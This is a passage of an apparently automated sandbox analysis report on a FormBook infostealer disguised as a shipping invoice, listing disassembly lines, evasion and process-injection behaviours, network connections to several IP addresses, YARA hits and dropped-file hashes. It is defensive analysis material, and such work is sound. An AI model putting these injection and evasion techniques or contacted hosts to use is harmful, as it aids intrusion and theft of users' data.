Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]	9_2_037CFDE2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]	9_2_03786DC9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]	9_2_03731DB5
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]	9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]	9_2_037D05AC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]	9_2_037335A1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]	9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]	9_2_0373FD9B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]	9_2_03732581
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]	9_2_03702D8A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]	9_2_037C2D82
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]	9_2_0372B477
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]	9_2_0373AC7B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0372746D mov eax, dword ptr fs:[00000030h]	9_2_0372746D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]	9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]	9_2_0379C450
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h]	9_2_0373A44B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h]	9_2_0373BC2C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]	9_2_037D740D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]	9_2_03786C0A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]	9_2_037C1C06
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h]	9_2_037C14FB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]	9_2_03786CF0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h]	9_2_037D8CD6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0371849B mov eax, dword ptr fs:[00000030h]	9_2_0371849B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]	9_2_037C4496

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

1_2_10002EDC

Enables debug privileges

Source: C:\Windows\SysWOW64\cmd.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_10004CBC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_10002ECD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_10007786

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 75.126.100.11 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.24 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.215.210.10 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 165.227.229.15 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.88.85.105 80	Jump to behavior

Hijacks the control flow in another process

Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165050 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771650F0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165180 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77165190 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771651A0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7717FEE0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 771133C0 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 77114760 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770D6590 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770DB510 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 770FC490 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EE00 value: E9	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory written: PID: 6360 base: 7711EFD0 value: E9	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Thread register set: target process: 3424			Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\cmd.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\cmd.exe

Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe			Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'			Jump to behavior

Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000000.710156984.000000000A716000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10008C6C cpuid

1_2_10008C6C

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

1_2_10008A23

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 1_2_10004896 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_10004896

Source: C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe

0_2_004033A9

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Source: unknown

Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 00000009.00000002.914200930.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.734077242.00000000047D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.733109064.0000000001190000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.728952355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.914419166.0000000002F60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPE

ID:	323227
Product:	CloudBasic
Start time:	15:06:20
Start date:	26.11.2020
Sample:	Shipping INVOICE-BL Shipment..exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	579ba39b6a146080ef6481591440e445
SHA1:	06bfc3b47e1ad6a35e10cb4a1edee6c563710107
SHA256:	d8d9bb65ea3637fda09488baada0c9b387e0619b7c430b93c8a0fa2d8b489bc1
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\3\phplive\12.opends60.dll	data	DAA2B2B53C73519E2CFE5239A33D7FE2	4CDC35F6B76191DFB8045FFA68994AD7D470491A	079BBC83AE9ECB7D781BD24EEDBAEEE2B58009906739990C97A0976AB9332E81
C:\Users\user\AppData\Local\Temp\3\phplive\66.opends60.dll	data	3F2A75E68F8D67494B386DFAA5ABE2B3	F405E0BC8B4FC2CAD111045C67E3C64343E2C7CA	E7AB6B06A1134F3EFE20FC5816AD5402C8E111FBD5031EC4F2C520224B9D5BDB
C:\Users\user\AppData\Local\Temp\3\phplive\DevCfgUI.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FE529E3B23EA66C07B43314EF0081B58	5CC7F144DCCB312B0DC6BA7AD0CB2456F2FC3C61	C2FA4308C73812360FC3FB01201B0FC9D1C6B53451ED15DF3739088A4C8789D5
C:\Users\user\AppData\Local\Temp\3\phplive\MSBuildFramework.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	27280F57DF0638B41F709DAC754330D8	B7F3BF2C0BF39E523B7E4C79D7DAFD1E59B84B60	75D22B4B3D7CD995B99CA4EB3EFA782F3BDFF9675BC64CCE409223109FDA6DE7
C:\Users\user\AppData\Local\Temp\3\phplive\competitorsalesliterature.xml	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators	AE2BF9A46C64D68E42ECB985C1D2DE71	9697E538D714CDF375EA907738DBFD219A0853FB	0F98148F02B339F99B13587FD33F9796CC2E8DA76FFBB4EB27AF6C3D2CBAC945
C:\Users\user\AppData\Local\Temp\3\phplive\flac.xml	XML 1.0 document, UTF-8 Unicode text	DABA225688B554152EB810A36D5AAA0B	B21070F810E2F18F198BB08409CA14EFC9EAEF5C	1806FD102100C6F3748942670CAAB86C19F7564CD69BB96A1FC0B29929230CCF
C:\Users\user\AppData\Local\Temp\3\phplive\guidgen.exe	PE32 executable (GUI) Intel 80386, for MS Windows	58C655527B57D74AE3C189A60A42DA18	F267630311A1C42CE9C4F0DEDA00E4132E9F8B25	A2F590DEA50CDE47B0325D7A9ADEEA464257F46B76C059CF3E1AB2DB65574685
C:\Users\user\AppData\Local\Temp\3\phplive\thermal-cpu-cdev-order.xml	exported SGML document, ASCII text	6BBB6D648BA2C70B9635E843818BEEBB	21BF5A1ACF381285EF3FE88D180B3F17D474804C	9E4A02255ACD8A4C10373B6E64454A95E57986C32245A6EDA7B8CF7F57E3D740
C:\Users\user\AppData\Local\Temp\3\phplive\vnd.ms-excel.sheet.macroenabled.12.xml	XML 1.0 document, UTF-8 Unicode text	5A6CAD444DBF130B22F855A889DBE677	8F91D234CBE3AFC1F1993BE8C63A68F756FDFC83	A76702F606092D47669779F8D48F2F701319437223D87EAD41D2FA068522FF87
C:\Users\user\AppData\Local\Temp\3\phplive\x-texinfo.xml	XML 1.0 document, UTF-8 Unicode text	61FFA6F5926C7F2CF819C2A0774D3E21	BEC77DA7C7492860DA713F8B87279CB1A3DDCB11	07A5F4DFB449940A7BEA1F100120AE284067F24961457FF5F56C16F556BE4856
C:\Users\user\AppData\Local\Temp\Erodium	data	980A6B092855D202363B6436E4A854E8	AA8E1A7E1AB7832C3112E5C35B7DA143FF919CE0	F617D029F947EBB5C0B7B159233E699F5653A1F92E81F9FE44C60555884DC93C
C:\Users\user\AppData\Local\Temp\Prehnite.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	F8AA685A3908110E79F4639AA7DADDFA	DD4D16172EA4851F757ABD34A8CB3C835552E6A3	AEEA4B86EA607CF9820E3CADD4E98353A57EC789EC0A0E2FEFBDD84ABD25194A
C:\Users\user\AppData\Local\Temp\fckeditor\makecert.exe	PE32 executable (console) Intel 80386, for MS Windows	ED1C00557CDE869CAA963BBF9C820F05	53BBD8B86FCBEE9316E02AF399634522B12539B0	4D50CE341BE70511E9A871DD347B3F5793EA97787CDFC92045C0BCC8AAE6E298
C:\Users\user\AppData\Local\Temp\font\init\msg\x-navi-animation.xml	XML 1.0 document, UTF-8 Unicode text	9565C08D6037EEA308B97581F12BE260	1954B1CFBF437BD79FDD597C15C25BB01B83F243	1199A3E8F3C8C23C59FEB468A1D1542BA6ABE3C373589DF0277924EAFDB50D57
C:\Users\user\AppData\Local\Temp\font\init\msg\x-pn-audibleaudio.xml	XML 1.0 document, ASCII text	AD1C969082DE8AA77B382516F5B0FF61	A83DC30341A5752A9D0D18770EF257C8C0B3A692	78930E0C87BC468FC5B13A5F971C244D9158C9DE7B1F2C219213E5CA18E60F03
C:\Users\user\AppData\Local\Temp\manage\mms\VCProjectEngine.dll	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators	3E2460DF0763A75406D2C92A6CAC864C	3CC0933DF52BD4B09767ADA563B58923EF68EBAF	301A735BCB6DE1DE09D0B9098228A419954404D8AA575F40AD82FC3A84403E35
C:\Users\user\AppData\Local\Temp\manage\mms\WordExceptList.xml	ASCII text, with very long lines	EF0EA2A1ECE97BE3CF9C9F1D30670E34	B960BCB826DA726AB2D919EEF781EE586DF4D607	BA85D3915E513AF98861E7AD82A42E80D957CE52A71463E6E34609C34F3A0E1C
C:\Users\user\AppData\Local\Temp\manage\mms\crtowordses.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	0C74A8A66DB361A91A8E46E256234B9D	B4EEB6CC71C68264B348824997930426DE1E6C41	245BC780CA69A4B6019625BD1046D7C1C0F4720B795BA2D091AC62B9B7C73DE1
C:\Users\user\AppData\Local\Temp\medium\listadmin\glance_config\eDbgJitUI.dll	PE32 executable (DLL) (Windows CE) ARM, for MS Windows	BC977F27DB75D9E99EF4733F6603AD0C	799BAF9192BDE18BF0B260840FFE5ADA27CD13A3	BEC1776C798A4DCED9C153A9739FADAAC1D80AF11FB652275A6038396C960CA6
C:\Users\user\AppData\Local\Temp\nse53A7.tmp	data	393215B51E4C54A6950B13796ABEA20F	77225F7A62F29560C7087176E187ED2012E0A25E	DA2F2572CCA884673B95FF9DD3C8BDF4598240F45F5206F110DF99EC6289EECA
C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\dbsvcui.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	585AC8F0CA13C1326C5E562B509B8E2D	B884490E95CEBA559E50E48F22E810D9E5925792	5551259AE036773BB93168503FE1BA75EA2E5718C02172FDCAE6E20B4B80CA25
C:\Users\user\AppData\Local\Temp\special_offers\dirb\123\number.xml	XML 1.0 document text	A75CA31F7ED72AF18B51615986EDA289	59CD60370C065551CC3B3EFEF5901B76DE930771	4C2CE6779620133C87EC716FA06DA2A3A9EA97862AC0B7AC1051B474573EE93E
C:\Users\user\AppData\Roaming\panel\box\xbox\67.opends60.dll	data	E4E4F671BDE80749EA2EB465FDA2568D	5CA98566B46E8BC5538399CB05F85A8F41DDE61F	82F834504F7C6FCE706E28083E8A93F52A61A84918B0CDCBDC0B1A70B505B1D1
